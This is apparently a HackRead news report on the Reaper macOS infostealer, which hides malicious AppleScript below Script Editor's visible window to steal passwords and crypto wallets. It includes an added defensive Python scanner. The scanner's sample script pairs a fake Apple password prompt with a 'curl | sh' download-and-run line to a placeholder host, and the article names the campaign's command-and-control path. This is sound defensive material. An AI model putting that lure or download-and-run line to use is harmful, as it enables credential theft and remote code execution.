HackRead

Reaper macOS Infostealer Abuses Script Editor to Steal Crypto and Passwords


macOS users are facing another malware campaign, this time involving a modified infostealer that poses as trusted technology brands to compromise local files and cryptocurrency assets.

As previously reported by Hackread.com, researchers at SentinelOne first identified the campaign distributing an updated version of SHub Stealer under the build tag Reaper. A later investigation by Moonlock has now provided more detail on the operation, showing how attackers used fake download pages for popular apps such as WeChat and Miro to target victims.

Image credit: SentinelOne and Moonlock

The Automated ClickFix Technique

According to Moonlock’s blog post, this campaign uses a variant of the ClickFix attack. In previous iterations, threat actors used deceptive web pages to convince victims to manually copy and paste malicious commands into the native macOS Terminal utility. To neutralise this specific risk, Apple implemented strict copy-and-paste restrictions within Terminal inside the macOS Tahoe 26.4 operating system release.

To bypass these restrictions, the Reaper campaign abandons the Terminal entirely: the fake websites use a custom URL scheme (applescript://) to automatically open the built-in macOS Script Editor app with the attacker's script loaded. The operators hide the malicious commands by padding the script with extensive ASCII art and arbitrary whitespace, so that the functional statements sit below the visible scroll boundary of the editor window.

This pushes the commands out of sight. When a user clicks the play button, thinking they are running a normal system update, the script executes. Because Script Editor is an official tool included with all versions of macOS, users rarely suspect any danger.
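The padding trick described above leaves a measurable trace in the script text itself: the first real statement sits far below the top of the file, long runs of blank lines precede it, and most of the non-blank lines are decoration rather than AppleScript. The following scanner is an added example for defenders, not code from Moonlock, SentinelOne or the campaign; the thresholds (a 60-line "visible window", a 50-line blank run), the `scan_applescript` helper and both sample scripts are constructed assumptions, and the sample obfuscated script uses a placeholder `example.invalid` host rather than any real infrastructure.

```python
"""Heuristic scanner for AppleScript text that hides its working
statements below the visible Script Editor window.

Thresholds, regexes and sample scripts are constructed assumptions
for this example; they are not taken from the original report."""
import re
from dataclasses import dataclass, field

# Lines that do something when the script runs (an AppleScript
# statement), as opposed to blank lines, comments or decoration.
FUNCTIONAL = re.compile(
    r"^\s*(do shell script|tell application|display dialog|set |repeat|"
    r"if |try|on |return|property|use |end )",
    re.IGNORECASE,
)
# Operations worth calling out individually.
SHELL_EXEC = re.compile(r"do shell script", re.IGNORECASE)
NET_FETCH = re.compile(r"\b(curl|wget|nscurl)\b", re.IGNORECASE)
HIDDEN_PROMPT = re.compile(r"with hidden answer", re.IGNORECASE)

# Assumed: roughly one Script Editor window of text at its default size.
VISIBLE_LINES = 60
# Assumed: a blank run this long almost never appears in a real script.
BLANK_RUN_LIMIT = 50


@dataclass
class Verdict:
    first_functional_line: int      # 1-based; 0 if no statement was found
    longest_blank_run: int
    filler_ratio: float             # non-statement, non-comment lines / non-blank lines
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def scan_applescript(text: str) -> Verdict:
    """Return a Verdict describing how much of the script is hidden padding."""
    lines = text.splitlines()
    first = 0
    longest = run = 0
    nonblank = filler = 0
    for i, line in enumerate(lines, start=1):
        if not line.strip():
            run += 1
            longest = max(longest, run)
            continue
        run = 0
        nonblank += 1
        if FUNCTIONAL.match(line):
            if first == 0:
                first = i
        elif not line.lstrip().startswith("--"):
            filler += 1     # neither a statement nor a comment: e.g. ASCII art
    ratio = filler / nonblank if nonblank else 0.0
    verdict = Verdict(first, longest, round(ratio, 2))
    if first > VISIBLE_LINES:
        verdict.reasons.append(f"first statement at line {first}, below the visible window")
    if longest >= BLANK_RUN_LIMIT:
        verdict.reasons.append(f"{longest} consecutive blank lines (padding)")
    if ratio > 0.5 and nonblank >= 5:
        verdict.reasons.append("mostly non-statement text (ASCII-art decoy)")
    if SHELL_EXEC.search(text) and NET_FETCH.search(text):
        verdict.reasons.append("shell execution combined with a network download")
    if HIDDEN_PROMPT.search(text):
        verdict.reasons.append("dialog collecting a hidden (password-style) answer")
    return verdict


# Constructed sample: an ordinary short script a user might write.
BENIGN_SCRIPT = """-- Greet the user
tell application "System Events"
    display dialog "Hello"
end tell
"""

# Constructed sample: a banner, hundreds of blank lines, then the real
# statements (fake update prompt plus a download-and-run one-liner).
ASCII_ART = "\n".join([
    "  _   _           _       _       ",
    " | | | |_ __   __| | __ _| |_ ___ ",
    " | | | | '_ \\ / _` |/ _` | __/ _ \\",
    " | |_| | |_) | (_| | (_| | ||  __/",
    "  \\___/| .__/ \\__,_|\\__,_|\\__\\___|",
    "       |_|                        ",
])
OBFUSCATED_SCRIPT = (
    ASCII_ART + "\n" * 400
    + 'display dialog "Apple Security Update requires your password" '
      'default answer "" with hidden answer\n'
    + 'do shell script "curl -fsSL https://example.invalid/update.sh | sh"\n'
)

if __name__ == "__main__":
    for name, script in (("benign", BENIGN_SCRIPT), ("obfuscated", OBFUSCATED_SCRIPT)):
        v = scan_applescript(script)
        print(name, "suspicious" if v.suspicious else "clean", v.reasons)
```

The structural signals (first statement far down, long blank runs, high filler ratio) are the ones specific to this lure; the keyword checks are generic and will also fire on legitimate admin scripts, so they are best weighted rather than used alone. Such a check can run on `.applescript`/`.scpt`-as-text files at rest or on the script body handed to Script Editor by an `applescript://` link, depending on where an organisation can hook it in.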

Multi-Stage Disguises and Data Theft

The attackers layer several disguises to gain the user's trust. The attack starts on fake software pages hosted on misspelled Microsoft web domains, such as mlcrosoft.co.com. Once the script runs, it displays a fake Apple security update message to trick the user into typing in their system password.

“The payload may be hosted on a typo-squatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory. Alongside the previously documented SHub feature set, the build also adds an AMOS-style document theft module with chunked uploads,” researchers explained.

Reaper then checks the computer’s keyboard configuration. If the keyboard is set to the Russian language, the program completely shuts down. If not, it activates an information-stealing feature modelled after Atomic macOS Stealer (AMOS).

It collects files with specific extensions (.docx, .pdf, .xlsx, .wallet and .keys) from the Desktop and Documents folders, packs them into ZIP archives split into 70MB chunks, and uploads the chunks with standard curl commands to an external command-and-control server at hebsbsbzjsjshduxbs.xyz/gate/chunk.

The malware also targets internet browsers like Chrome, Firefox, and Edge to steal saved passwords, along with browser extensions like 1Password and MetaMask. For desktop crypto wallets, including Ledger Live, Trezor Suite, and Exodus, Reaper modifies the actual internal code of the applications to intercept and divert future funds. Finally, it sets up a permanent backdoor inside a fake Google Software Update directory to maintain remote access to the computer.


This is the third campaign in under two months to adopt this automated distribution style. Researchers therefore advise users to always double-check website addresses, never type their Mac password into unexpected pop-up boxes, and use reliable security software that can detect these hidden scripts before they execute.
